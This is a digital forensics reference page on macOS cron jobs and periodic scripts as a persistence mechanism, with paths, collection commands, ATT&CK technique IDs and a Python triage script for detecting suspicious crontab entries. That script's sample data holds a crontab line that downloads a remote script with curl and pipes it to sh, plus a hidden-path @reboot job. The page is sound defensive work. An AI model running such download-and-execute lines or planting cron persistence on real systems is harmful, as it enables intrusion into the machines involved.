Cron Jobs & Periodic Scripts

macOS | Persistence Mechanisms | Disk Image

Location

/usr/lib/cron/tabs/ (user crontabs), /etc/crontab, /etc/periodic/ (daily/weekly/monthly)

Description

macOS supports both traditional cron job scheduling via crontab and the periodic system that runs maintenance scripts at daily, weekly, and monthly intervals via launchd. User crontabs are stored in /usr/lib/cron/tabs/ and system-wide tasks in /etc/crontab. The periodic directories contain shell scripts executed by the com.apple.periodic-* LaunchDaemons.

Forensic Value

While LaunchAgents and LaunchDaemons are the dominant macOS scheduling mechanisms, cron jobs remain functional and are used by attackers who are more familiar with Linux persistence techniques. User crontabs in /usr/lib/cron/tabs/ may contain entries that download and execute payloads from external URLs. Scripts added to /etc/periodic/daily/ execute as root once per day and can fly under the radar because administrators expect files in these directories. File modification timestamps and content analysis of periodic scripts identify unauthorized additions.

Tools Required

crontab -l, cat, find, mac_apt, KnockKnock (Objective-See)

Collection Commands

crontab

for user in $(dscl . -list /Users | grep -v "^_"); do echo "=== $user ===" && sudo crontab -l -u "$user" 2>/dev/null; done > /forensics/crontabs.txt

find

find /etc/periodic/ -type f -exec stat -f "%Sm %N" -t "%Y-%m-%d %H:%M:%S" {} \; > /forensics/periodic_scripts_timeline.txt

cp

sudo cp -Rp /usr/lib/cron/tabs/ /etc/periodic/ /forensics/cron_periodic_backup/

stat

sudo sh -c 'stat -f "%Sm %N" /etc/crontab /usr/lib/cron/tabs/* 2>/dev/null' > /forensics/crontab_timestamps.txt
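Triage of the collected crontabs, as an added example that is not part of the original page: it parses the "=== user ===" layout written by the crontab loop above and flags jobs that match the download-and-execute pattern described under Forensic Value. The rule names, the regular expressions and the sample input are assumptions constructed for illustration.

```python
import re

# Constructed sample: "=== user ===" header, then that user's crontab -l output.
SAMPLE = """\
=== root ===
=== alice ===
# weekly backup
MAILTO=""
0 9 * * 1 /usr/local/bin/backup.sh
*/15 * * * * curl -s http://203.0.113.10/u.sh | sh
=== bob ===
@reboot /Users/bob/.cache/.agent >/dev/null 2>&1
"""

HEADER = re.compile(r"^=== (.+) ===$")
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")
# Triage heuristics chosen for this example; tune them per environment.
RULES = {
    "network-fetch": re.compile(r"\b(curl|wget)\b|https?://", re.I),
    "pipe-to-interpreter": re.compile(r"\|\s*(\S*/)?(ba|z)?sh\b"),
    "hidden-or-temp-path": re.compile(r"/\.[^/\s.]|/tmp/|/Users/Shared/"),
}

def parse(text):
    """Yield (user, schedule, command) for each job in user crontabs."""
    user = None
    for raw in text.splitlines():
        line = raw.strip()
        header = HEADER.match(line)
        if header:
            user = header.group(1)
        elif line.startswith("@"):          # @reboot, @daily, ...
            fields = line.split(None, 1)
            if len(fields) == 2:
                yield user, fields[0], fields[1]
        elif line and not line.startswith("#") and not ENV_LINE.match(line):
            fields = line.split(None, 5)    # five time fields, then command
            if len(fields) == 6:
                yield user, " ".join(fields[:5]), fields[5]

def triage(text):
    """Return (user, schedule, command, reasons) for jobs worth reviewing."""
    findings = []
    for user, schedule, command in parse(text):
        reasons = sorted(n for n, rx in RULES.items() if rx.search(command))
        reasons += ["runs-at-boot"] if schedule == "@reboot" else []
        if reasons:
            findings.append((user, schedule, command, reasons))
    return findings
```

Pass it the contents of /forensics/crontabs.txt. /etc/crontab needs separate handling because it carries a user field before the command.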

Collection Constraints

  • Paths, schemas, and permission boundaries vary by macOS release, Full Disk Access state, and whether data came from a live collection, mounted image, or backup source.

MITRE ATT&CK Techniques

T1053.003, T1053, T1059.004, T1036.005